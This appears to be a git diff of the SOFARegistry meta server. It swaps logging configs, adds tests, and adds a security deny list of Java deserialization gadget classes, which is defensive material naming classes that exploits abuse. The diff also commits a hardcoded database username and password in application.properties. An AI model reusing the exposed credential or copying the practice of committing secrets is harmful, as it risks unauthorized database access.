Exp $ - */ -public class MetaNodeSingleTaskProcessor implements TaskProcessor { - - private static final Logger LOGGER = LoggerFactory.getLogger(MetaNodeSingleTaskProcessor.class, - "[Task]"); - - @Override - public ProcessingResult process(MetaServerTask task) { - try { - LOGGER.info("execute " + task); - task.execute(); - LOGGER.info("end " + task); - return ProcessingResult.Success; - } catch (Throwable throwable) { - LOGGER.error("Meta node SingleTask Process error!", throwable); - if (task instanceof Retryable) { - Retryable retryAbleTask = (Retryable) task; - if (retryAbleTask.checkRetryTimes()) { - return ProcessingResult.TransientError; - } - } - return ProcessingResult.PermanentError; - } - } - - @Override - public ProcessingResult process(List tasks) { - return null; - } -} \ No newline at end of file diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/task/processor/SessionNodeSingleTaskProcessor.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/task/processor/SessionNodeSingleTaskProcessor.java deleted file mode 100644 index ec0e6f7c2..000000000 --- a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/task/processor/SessionNodeSingleTaskProcessor.java +++ /dev/null @@ -1,61 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.meta.task.processor; - -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.server.meta.task.MetaServerTask; -import com.alipay.sofa.registry.task.Retryable; -import com.alipay.sofa.registry.task.batcher.TaskProcessor; - -import java.util.List; - -/** - * - * @author shangyu.wh - * @version $Id: SessionNodeSingleTaskProcessor.java, v 0.1 2018-01-15 16:42 shangyu.wh Exp $ - */ -public class SessionNodeSingleTaskProcessor implements TaskProcessor { - - private static final Logger LOGGER = LoggerFactory.getLogger( - SessionNodeSingleTaskProcessor.class, "[Task]"); - - @Override - public ProcessingResult process(MetaServerTask task) { - try { - LOGGER.info("execute " + task); - task.execute(); - LOGGER.info("end " + task); - return ProcessingResult.Success; - - } catch (Throwable throwable) { - LOGGER.error("Session node SingleTask Process error!", throwable); - if (task instanceof Retryable) { - Retryable retryAbleTask = (Retryable) task; - if (retryAbleTask.checkRetryTimes()) { - return ProcessingResult.TransientError; - } - } - return ProcessingResult.PermanentError; - } - } - - @Override - public ProcessingResult process(List tasks) { - return null; - } -} \ No newline at end of file diff --git a/server/server/meta/src/main/resources/application.properties b/server/server/meta/src/main/resources/application.properties index 2449af5b3..05beb0e5c 100644 --- a/server/server/meta/src/main/resources/application.properties +++ b/server/server/meta/src/main/resources/application.properties @@ -1,6 +1,6 @@ spring.main.banner-mode=LOG -#nodes.metaNode=: -#nodes.localDataCenter= +nodes.metaNode=DefaultDataCenter:localhost +nodes.localDataCenter=DefaultDataCenter #meta.server.logging.level=INFO #meta.server.logging.home=/home/admin/logs/registry/meta @@ -10,3 +10,18 @@ meta.server.metaServerPort=9612 meta.server.raftServerPort=9614 meta.server.httpServerPort=9615 meta.server.raftGroup=MetaServerRaftGroup + + +## connect db +persistence.profile.active=jdbc +jdbc.driverClassName = com.mysql.jdbc.Driver +jdbc.url = jdbc:mysql://127.0.0.1:2883/metadatadb?useUnicode=true&characterEncoding=utf8 +jdbc.username = obvip_infra_dev_1:infra_public_dev0_2769:metadatadb +jdbc.password = 7Yh4Csc4 + + +#jdbc.typeAliasesPackage=com.alipay.sofa.registry.jdbc.domain +jdbc.mapperLocations=classpath:mapper/*.xml + +meta.server.elector.lockExpireDuration=20000 +meta.server.revisionGcSilenceHour=24 diff --git a/server/server/meta/src/main/resources/log4j2.xml b/server/server/meta/src/main/resources/log4j2.xml new file mode 100644 index 000000000..d40cbe4cd --- /dev/null +++ b/server/server/meta/src/main/resources/log4j2.xml @@ -0,0 +1,239 @@ + + + + + ${user.home}/logs/registry/meta + INFO + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/server/server/meta/src/main/resources/logback-spring.xml b/server/server/meta/src/main/resources/logback-spring.xml deleted file mode 100644 index 9251cda98..000000000 --- a/server/server/meta/src/main/resources/logback-spring.xml +++ /dev/null @@ -1,223 +0,0 @@ - - - - - - - - - - - - - [%d{ISO8601}][%p][%t][%c{0}] - %m%n - - - - - true - - ERROR - - ${META_LOG_HOME}/common-error.log - - ${META_LOG_HOME}/common-error.log.%d{yyyy-MM-dd} - 30 - - - [%d{ISO8601}][%p][%t][%c{0}] - %m%n - ${LOG_ENCODE} - - - - - true - - ${LOG_LEVEL} - - - ERROR - DENY - - ${META_LOG_HOME}/common-default.log - - ${META_LOG_HOME}/common-default.log.%d{yyyy-MM-dd} - 30 - - - [%d{ISO8601}][%p][%t][%c{0}] - %m%n - ${LOG_ENCODE} - - - - - true - - ${LOG_LEVEL} - - - ERROR - DENY - - ${META_LOG_HOME}/registry-raft.log - - ${META_LOG_HOME}/registry-raft.log.%d{yyyy-MM-dd} - 30 - - - [%d{ISO8601}][%p][%t][%c{0}] - %m%n - ${LOG_ENCODE} - - - - - - - true - - ${LOG_LEVEL} - - - ERROR - DENY - - ${META_LOG_HOME}/registry-meta.log - - ${META_LOG_HOME}/registry-meta.log.%d{yyyy-MM-dd} - 30 - - - [%d{ISO8601}][%p][%t][%c{0}] - %m%n - ${LOG_ENCODE} - - - - - true - - ${LOG_LEVEL} - - - ERROR - DENY - - ${META_LOG_HOME}/registry-startup.log - - ${META_LOG_HOME}/registry-startup.log.%d{yyyy-MM-dd} - 30 - - - [%d{ISO8601}][%p][%t][%c{0}] - %m%n - ${LOG_ENCODE} - - - - - true - - ${LOG_LEVEL} - - - ERROR - DENY - - ${META_LOG_HOME}/registry-connect.log - - ${META_LOG_HOME}/registry-connect.log.%d{yyyy-MM-dd} - 30 - - - [%d{ISO8601}][%p][%t][%c{0}] - %m%n - ${LOG_ENCODE} - - - - - true - - ${LOG_LEVEL} - - - ERROR - DENY - - ${META_LOG_HOME}/registry-raft-metrics.log - - ${META_LOG_HOME}/registry-raft-metrics.log.%d{yyyy-MM-dd} - 30 - - - [%d{ISO8601}][%p][%t][%c{0}] - %m%n - ${LOG_ENCODE} - - - - - true - - ${LOG_LEVEL} - - - ERROR - DENY - - ${META_LOG_HOME}/registry-http.log - - ${META_LOG_HOME}/registry-http.log.%d{yyyy-MM-dd} - 30 - - - [%d{ISO8601}][%p][%t][%c{0}] - %m%n - ${LOG_ENCODE} - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - \ No newline at end of file diff --git a/server/server/meta/src/main/resources/security/blacklist.txt b/server/server/meta/src/main/resources/security/blacklist.txt new file mode 100644 index 000000000..e3413f8d4 --- /dev/null +++ b/server/server/meta/src/main/resources/security/blacklist.txt @@ -0,0 +1,78 @@ +org.codehaus.groovy.runtime.MethodClosure +clojure.core$constantly +clojure.main$eval_opt +com.alibaba.citrus.springext.support.parser.AbstractNamedProxyBeanDefinitionParser$ProxyTargetFactory +com.alibaba.citrus.springext.support.parser.AbstractNamedProxyBeanDefinitionParser$ProxyTargetFactoryImpl +com.alibaba.citrus.springext.util.SpringExtUtil.AbstractProxy +com.alipay.custrelation.service.model.redress.Pair +com.caucho.hessian.test.TestCons +com.mchange.v2.c3p0.JndiRefForwardingDataSource +com.mchange.v2.c3p0.WrapperConnectionPoolDataSource +com.rometools.rome.feed.impl.EqualsBean +com.rometools.rome.feed.impl.ToStringBean +com.sun.jndi.rmi.registry.BindingEnumeration +com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl +com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl +com.sun.rowset.JdbcRowSetImpl +com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data +java.rmi.server.UnicastRemoteObject +java.security.SignedObject +java.util.ServiceLoader$LazyIterator +javax.imageio.ImageIO$ContainsFilter +javax.imageio.spi.ServiceRegistry +javax.management.BadAttributeValueExpException +javax.naming.InitialContext +javax.naming.spi.ObjectFactory +javax.script.ScriptEngineManager +javax.sound.sampled.AudioFormat$Encoding +org.apache.carbondata.core.scan.expression.ExpressionResult +org.apache.commons.dbcp +org.apache.commons.dbcp2 +org.apache.commons.beanutils +org.apache.ibatis.executor.loader.AbstractSerialStateHolder +org.apache.ibatis.executor.loader.CglibSerialStateHolder +org.apache.ibatis.executor.loader.JavassistSerialStateHolder +org.apache.ibatis.executor.loader.cglib.CglibProxyFactory +org.apache.ibatis.executor.loader.javassist.JavassistSerialStateHolder +org.apache.tomcat.dbcp.dbcp.datasources.SharedPoolDataSource +org.apache.wicket.util.upload.DiskFileItem +org.apache.xalan.xsltc.trax.TemplatesImpl +org.apache.xbean.naming.context.ContextUtil$ReadOnlyBinding +org.apache.xpath.XPathContext +org.eclipse.jetty.util.log.LoggerLog +org.geotools.filter.ConstantExpression +org.springframework.aop.aspectj.autoproxy.AspectJAwareAdvisorAutoProxyCreator$PartiallyComparableAdvisorHolder +org.springframework.aop.support.DefaultBeanFactoryPointcutAdvisor +org.springframework.beans.factory.BeanFactory +org.springframework.beans.factory.config.PropertyPathFactoryBean +org.springframework.beans.factory.support.DefaultListableBeanFactory +org.springframework.jndi.support.SimpleJndiBeanFactory +org.springframework.orm.jpa.AbstractEntityManagerFactoryBean +org.springframework.transaction.jta.JtaTransactionManager +org.yaml.snakeyaml.tokens.DirectiveToken +sun.rmi.server.UnicastRef +javax.management.ImmutableDescriptor +org.springframework.jndi.JndiObjectTargetSource +ch.qos.logback.core.db.JNDIConnectionSource +java.beans.Expression +javassist.bytecode +javassist.tools.web.Viewer +javassist.util.proxy.SerializedProxy +org.apache.ibatis.javassist.bytecode +org.apache.ibatis.javassist.tools.web.Viewer +org.apache.ibatis.javassist.util.proxy.SerializedProxy +org.springframework.beans.factory.config.MethodInvokingFactoryBean +com.alibaba.druid +com.sun.corba +com.sun.org.apache.bcel +com.sun.org.apache.xml +com.sun.org.apache.xpath +org.apache.zookeeper.Shell +org.apache.tomcat.dbcp.dbcp.BasicDataSource +net.bytebuddy.dynamic.loading.ByteArrayClassLoader +org.jboss.resteasy.plugins +org.springframework.beans.BeanWrapperImpl$BeanPropertyHandler +org.apache.velocity.runtime.resource.Resource +org.springframework.expression.spel.ast.Indexer$PropertyIndexingValueRef +org.mortbay.log.Slf4jLog +org.springframework.expression.spel.ast.MethodReference$MethodValueRef \ No newline at end of file diff --git a/server/server/meta/src/test/java/com/alipay/sofa/registry/AllTests.java b/server/server/meta/src/test/java/com/alipay/sofa/registry/AllTests.java new file mode 100644 index 000000000..89adf4d4b --- /dev/null +++ b/server/server/meta/src/test/java/com/alipay/sofa/registry/AllTests.java @@ -0,0 +1,108 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry; + +/** + * @author chen.zhu + *

Nov 13, 2020 + */ +import com.alipay.sofa.registry.common.model.slot.Crc32CSlotFunctionTest; +import com.alipay.sofa.registry.server.meta.cluster.node.NodeModifiedTest; +import com.alipay.sofa.registry.server.meta.cluster.node.TestAbstractNodeEventTest; +import com.alipay.sofa.registry.server.meta.lease.LeaseTest; +import com.alipay.sofa.registry.server.meta.lease.data.DefaultDataServerManagerTest; +import com.alipay.sofa.registry.server.meta.lease.filter.DefaultRegistryForbiddenServerManagerTest; +import com.alipay.sofa.registry.server.meta.lease.impl.*; +import com.alipay.sofa.registry.server.meta.lease.session.DefaultSessionServerManagerTest; +import com.alipay.sofa.registry.server.meta.metaserver.impl.*; +import com.alipay.sofa.registry.server.meta.monitor.DefaultSlotTableMonitorTest; +import com.alipay.sofa.registry.server.meta.monitor.data.DataServerStatsTest; +import com.alipay.sofa.registry.server.meta.monitor.impl.DefaultSlotStatsTest; +import com.alipay.sofa.registry.server.meta.monitor.impl.DefaultSlotTableStatsTest; +import com.alipay.sofa.registry.server.meta.provide.data.DefaultProvideDataNotifierTest; +import com.alipay.sofa.registry.server.meta.remoting.data.DefaultDataServerServiceTest; +import com.alipay.sofa.registry.server.meta.remoting.handler.HeartbeatRequestHandlerTest; +import com.alipay.sofa.registry.server.meta.remoting.session.DefaultSessionServerServiceTest; +import com.alipay.sofa.registry.server.meta.resource.*; +import com.alipay.sofa.registry.server.meta.resource.filter.LeaderAwareFilterTest; +import com.alipay.sofa.registry.server.meta.slot.arrange.CrossDcSlotAllocatorTest; +import com.alipay.sofa.registry.server.meta.slot.arrange.ScheduledSlotArrangerTest; +import com.alipay.sofa.registry.server.meta.slot.balance.LeaderOnlyBalancerTest; +import com.alipay.sofa.registry.server.meta.slot.manager.DefaultSlotManagerTest; +import com.alipay.sofa.registry.server.meta.slot.manager.SimpleSlotManagerTest; +import com.alipay.sofa.registry.server.meta.slot.tasks.BalanceTaskTest; +import com.alipay.sofa.registry.server.meta.slot.tasks.SlotMigrationIntegrationTest; +import com.alipay.sofa.registry.server.meta.slot.util.MigrateSlotGroupTest; +import com.alipay.sofa.registry.server.meta.slot.util.NodeComparatorTest; +import com.alipay.sofa.registry.server.meta.slot.util.SlotBuilderTest; +import com.alipay.sofa.registry.server.meta.slot.util.SlotTableBuilderTest; +import com.alipay.sofa.registry.server.shared.slot.DiskSlotTableRecorderTest; +import org.junit.runner.RunWith; +import org.junit.runners.Suite; + +@RunWith(Suite.class) +@Suite.SuiteClasses({ + Crc32CSlotFunctionTest.class, + // DefaultCrossDcMetaServerTest.class, + CrossDcSlotAllocatorTest.class, + DefaultCurrentDcMetaServerTest.class, + DefaultSessionServerManagerTest.class, + DefaultDataServerManagerTest.class, + CrossDcMetaServerManagerTest.class, + LeaseTest.class, + HeartbeatRequestHandlerTest.class, + DefaultMetaServerManagerTest.class, + DefaultDataServerServiceTest.class, + LocalMetaServerTest.class, + DefaultSessionServerServiceTest.class, + DefaultProvideDataNotifierTest.class, + SimpleSlotManagerTest.class, + NodeModifiedTest.class, + BalanceTaskTest.class, + TestAbstractNodeEventTest.class, + DefaultSlotManagerTest.class, + DefaultSlotTableMonitorTest.class, + DiskSlotTableRecorderTest.class, + SlotTableResourceTest.class, + SlotMigrationIntegrationTest.class, + SlotTableBuilderTest.class, + SlotBuilderTest.class, + NodeComparatorTest.class, + MigrateSlotGroupTest.class, + ScheduledSlotArrangerTest.class, + LeaderOnlyBalancerTest.class, + DefaultRegistryForbiddenServerManagerTest.class, + TestAbstractEvictableLeaseManagerTest.class, + SimpleLeaseManagerTest.class, + LeaderAwareLeaseManagerTest.class, + AbstractEvictableFilterableLeaseManagerTest.class, + DefaultMetaLeaderElectorTest.class, + DataServerStatsTest.class, + DataServerStatsTest.class, + DefaultSlotStatsTest.class, + DefaultSlotTableStatsTest.class, + LeaderAwareFilterTest.class, + ProvideDataResourceTest.class, + StopPushDataResourceTest.class, + MetaDigestResourceTest.class, + HealthResourceTest.class, + MetaLeaderResourceTest.class, + BlacklistDataResourceTest.class, + RegistryCoreOpsResourceTest.class, + SlotSyncResourceTest.class +}) +public class AllTests {} diff --git a/server/server/meta/src/test/java/com/alipay/sofa/registry/common/model/slot/BaseSlotFunctionTest.java b/server/server/meta/src/test/java/com/alipay/sofa/registry/common/model/slot/BaseSlotFunctionTest.java new file mode 100644 index 000000000..0f078d76d --- /dev/null +++ b/server/server/meta/src/test/java/com/alipay/sofa/registry/common/model/slot/BaseSlotFunctionTest.java @@ -0,0 +1,37 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.slot; + +import com.alipay.sofa.registry.server.meta.AbstractMetaServerTestBase; +import com.alipay.sofa.registry.util.FileUtils; +import com.alipay.sofa.registry.util.JsonUtils; +import java.io.File; +import java.io.IOException; + +/** + * @author chen.zhu + *

Jan 13, 2021 + */ +public class BaseSlotFunctionTest extends AbstractMetaServerTestBase { + + public String[] getDataInfoIds() throws IOException { + String fileContent = + new String( + FileUtils.readFileToByteArray(new File("src/test/resources/test/data_info_ids.json"))); + return JsonUtils.read(fileContent, String[].class); + } +} diff --git a/server/server/meta/src/test/java/com/alipay/sofa/registry/common/model/slot/Crc32CSlotFunctionTest.java b/server/server/meta/src/test/java/com/alipay/sofa/registry/common/model/slot/Crc32CSlotFunctionTest.java new file mode 100644 index 000000000..aca9f012c --- /dev/null +++ b/server/server/meta/src/test/java/com/alipay/sofa/registry/common/model/slot/Crc32CSlotFunctionTest.java @@ -0,0 +1,88 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.slot; + +import com.alipay.sofa.registry.common.model.slot.func.Crc32cSlotFunction; +import com.alipay.sofa.registry.util.JsonUtils; +import com.google.common.collect.Maps; +import java.io.IOException; +import java.util.Map; +import java.util.concurrent.CountDownLatch; +import java.util.concurrent.CyclicBarrier; +import org.junit.Assert; +import org.junit.Before; +import org.junit.Test; + +public class Crc32CSlotFunctionTest extends BaseSlotFunctionTest { + + private Crc32cSlotFunction slotFunction; + + @Before + public void beforeCRC32SlotFunctionTest() { + slotFunction = new Crc32cSlotFunction(); + } + + @Test + public void testMaxSlots() { + Assert.assertEquals(SlotConfig.SLOT_NUM, slotFunction.maxSlots()); + } + + @Test + public void testSlotOfMultiThreadSafe() throws InterruptedException { + int tasks = 100; + final String mark = randomString(); + int expected = slotFunction.slotOf(mark); + CyclicBarrier barrier = new CyclicBarrier(tasks); + CountDownLatch latch = new CountDownLatch(tasks); + for (int i = 0; i < tasks; i++) { + executors.execute( + new Runnable() { + @Override + public void run() { + try { + barrier.await(); + } catch (Exception e) { + } + Assert.assertEquals(expected, slotFunction.slotOf(mark)); + latch.countDown(); + } + }); + } + latch.await(); + } + + @Test + public void testBalance() throws IOException { + String[] dataInfoIds = getDataInfoIds(); + int slotNums = 256; + Map counter = Maps.newHashMap(); + for (int i = 0; i < slotNums; i++) { + counter.put(i, 0); + } + slotFunction = new Crc32cSlotFunction(slotNums); + logger.info("[length] {}", dataInfoIds.length); + for (String dataInfoId : dataInfoIds) { + int slotId = slotFunction.slotOf(dataInfoId); + counter.put(slotId, counter.get(slotId) + 1); + } + logger.info( + "[result]\n{}", + JsonUtils.getJacksonObjectMapper() + .writerWithDefaultPrettyPrinter() + .writeValueAsString(counter)); + } +} diff --git a/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/AbstractH2DbTestBase.java b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/AbstractH2DbTestBase.java new file mode 100644 index 000000000..596a591f4 --- /dev/null +++ b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/AbstractH2DbTestBase.java @@ -0,0 +1,188 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta; + +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.util.FileUtils; +import java.io.*; +import java.sql.Connection; +import java.sql.DriverManager; +import java.sql.PreparedStatement; +import java.sql.SQLException; +import org.apache.commons.io.IOUtils; +import org.apache.commons.lang.StringUtils; +import org.apache.logging.log4j.util.Strings; +import org.h2.tools.Server; +import org.junit.BeforeClass; +import org.junit.runner.RunWith; +import org.springframework.beans.BeansException; +import org.springframework.boot.autoconfigure.SpringBootApplication; +import org.springframework.boot.test.context.SpringBootTest; +import org.springframework.context.ApplicationContext; +import org.springframework.context.ApplicationContextAware; +import org.springframework.test.context.ActiveProfiles; +import org.springframework.test.context.junit4.SpringJUnit4ClassRunner; + +/** + * @author chen.zhu + *

Mar 15, 2021 + */ +@ActiveProfiles("test") +@SpringBootTest(classes = AbstractH2DbTestBase.JdbcTestConfig.class) +@RunWith(SpringJUnit4ClassRunner.class) +public class AbstractH2DbTestBase extends AbstractTestBase implements ApplicationContextAware { + + private static final Logger LOGGER = LoggerFactory.getLogger(AbstractH2DbTestBase.class); + public static final String TABLE_STRUCTURE = "sql/h2/create_table.sql"; + public static final String TABLE_DATA = "sql/h2/base_info.sql"; + + protected final String KEY_H2_PORT = "h2Port"; + private Server h2Server; + + protected ApplicationContext applicationContext; + + @BeforeClass + public static void beforeAbstractH2DbTestBase() + throws SQLException, IOException, ClassNotFoundException { + createTables(); + } + + protected void startH2Server() throws SQLException { + + int h2Port = Integer.parseInt(System.getProperty(KEY_H2_PORT, "9123")); + h2Server = Server.createTcpServer("-tcpPort", String.valueOf(h2Port), "-tcpAllowOthers"); + h2Server.start(); + // new Console().runTool(); + } + + protected String prepareDatas() { + return ""; + } + + private static void createTables() throws ClassNotFoundException, SQLException, IOException { + String driver = "org.h2.Driver"; + Class.forName(driver); + String url = "jdbc:h2:mem:metadatadb;DB_CLOSE_DELAY=-1;MODE=MySQL;MV_STORE=FALSE"; + String username = "sa"; + String password = ""; + Connection connection = null; + try { + connection = DriverManager.getConnection(url, username, password); + executeSqlScript(connection, readFileAsString(TABLE_STRUCTURE)); + } finally { + if (connection != null) { + connection.close(); + } + } + } + + public static String readFileAsString(String fileName) throws IOException { + + try (InputStream ins = getFileInputStream(fileName)) { + String fileContent = IOUtils.toString(ins); + return fileContent; + } + } + + public static InputStream getFileInputStream(String fileName) throws FileNotFoundException { + + return getFileInputStream("./", fileName, FileUtils.class); + } + + public static InputStream getFileInputStream(String path, String fileName, Class clazz) + throws FileNotFoundException { + + File f = null; + if (path != null) { + f = new File(path + "/" + fileName); + if (f.exists()) { + try { + LOGGER.info("[getFileInputStream]{}", f.getAbsolutePath()); + return new FileInputStream(f); + } catch (IOException e) { + throw new IllegalArgumentException("file load fail:" + f, e); + } + } + } + + // try file + f = new File(fileName); + if (f.exists()) { + try { + LOGGER.info("[getFileInputStream]{}", f.getAbsolutePath()); + return new FileInputStream(f); + } catch (IOException e) { + throw new IllegalArgumentException("file load fail:" + f, e); + } + } + + // try classpath + java.net.URL url = clazz.getResource(fileName); + if (url == null) { + url = clazz.getClassLoader().getResource(fileName); + } + if (url != null) { + try { + LOGGER.info("[load]{}", url); + return url.openStream(); + } catch (IOException e) { + throw new IllegalArgumentException("classpath load fail:" + url, e); + } + } + + throw new FileNotFoundException(path + "," + fileName); + } + + protected static void executeSqlScript(Connection conn, String prepareSql) throws SQLException { + if (StringUtils.isEmpty(prepareSql)) { + return; + } + PreparedStatement stmt = null; + try { + conn.setAutoCommit(false); + if (!Strings.isEmpty(prepareSql)) { + for (String sql : prepareSql.split(";")) { + stmt = conn.prepareStatement(sql); + stmt.executeUpdate(); + } + } + conn.commit(); + + } catch (Exception ex) { + if (null != conn) { + conn.rollback(); + } + } finally { + if (null != stmt) { + stmt.close(); + } + if (null != conn) { + conn.setAutoCommit(true); + conn.close(); + } + } + } + + @Override + public void setApplicationContext(ApplicationContext applicationContext) throws BeansException { + this.applicationContext = applicationContext; + } + + @SpringBootApplication + public static class JdbcTestConfig {} +} diff --git a/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/AbstractMetaHttpResourceTestBase.java b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/AbstractMetaHttpResourceTestBase.java new file mode 100644 index 000000000..7ac995205 --- /dev/null +++ b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/AbstractMetaHttpResourceTestBase.java @@ -0,0 +1,95 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta; + +import com.alipay.sofa.registry.common.model.store.URL; +import com.alipay.sofa.registry.net.NetUtil; +import com.alipay.sofa.registry.remoting.Server; +import com.alipay.sofa.registry.remoting.exchange.Exchange; +import com.alipay.sofa.registry.server.meta.bootstrap.MetaServerConfiguration; +import java.io.IOException; +import java.lang.annotation.Annotation; +import java.util.Map; +import java.util.concurrent.atomic.AtomicBoolean; +import javax.ws.rs.Path; +import javax.ws.rs.ext.Provider; +import org.glassfish.jersey.server.ResourceConfig; +import org.junit.Before; +import org.junit.Test; +import org.springframework.beans.factory.annotation.Autowired; +import org.springframework.boot.builder.SpringApplicationBuilder; +import org.springframework.context.ApplicationContext; + +/** + * @author chen.zhu + *

Apr 06, 2021 + */ +public class AbstractMetaHttpResourceTestBase extends AbstractMetaServerTestBase { + + private ResourceConfig resourceConfig = new ResourceConfig(); + + private final AtomicBoolean httpStart = new AtomicBoolean(false); + + private Server httpServer; + + @Autowired private Exchange jerseyExchange; + + @Autowired private ApplicationContext applicationContext; + + @Before + public void beforeAbstractMetaHttpResourceTestBase() { + SpringApplicationBuilder builder = new SpringApplicationBuilder(MetaServerConfiguration.class); + builder.run(); + openHttpServer(); + } + + @Test + public void test() throws IOException { + waitForAnyKeyToExit(); + } + + private void openHttpServer() { + try { + if (httpStart.compareAndSet(false, true)) { + bindResourceConfig(); + httpServer = + jerseyExchange.open( + new URL( + NetUtil.getLocalAddress().getHostAddress(), + metaServerConfig.getHttpServerPort()), + new ResourceConfig[] {resourceConfig}); + logger.info("Open http server port {} success!", metaServerConfig.getHttpServerPort()); + } + } catch (Exception e) { + httpStart.set(false); + logger.error("Open http server port {} error!", metaServerConfig.getHttpServerPort(), e); + throw new RuntimeException("Open http server error!", e); + } + } + + private void bindResourceConfig() { + registerInstances(Path.class); + registerInstances(Provider.class); + } + + private void registerInstances(Class annotationType) { + Map beans = applicationContext.getBeansWithAnnotation(annotationType); + if (beans != null && beans.size() > 0) { + beans.forEach((beanName, bean) -> resourceConfig.registerInstances(bean)); + } + } +} diff --git a/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/AbstractMetaServerTestBase.java b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/AbstractMetaServerTestBase.java new file mode 100644 index 000000000..261208f3d --- /dev/null +++ b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/AbstractMetaServerTestBase.java @@ -0,0 +1,693 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta; + +import static org.mockito.Mockito.mock; +import static org.mockito.Mockito.when; + +import com.alipay.sofa.registry.common.model.Node; +import com.alipay.sofa.registry.common.model.console.PersistenceData; +import com.alipay.sofa.registry.common.model.console.PersistenceDataBuilder; +import com.alipay.sofa.registry.common.model.metaserver.nodes.DataNode; +import 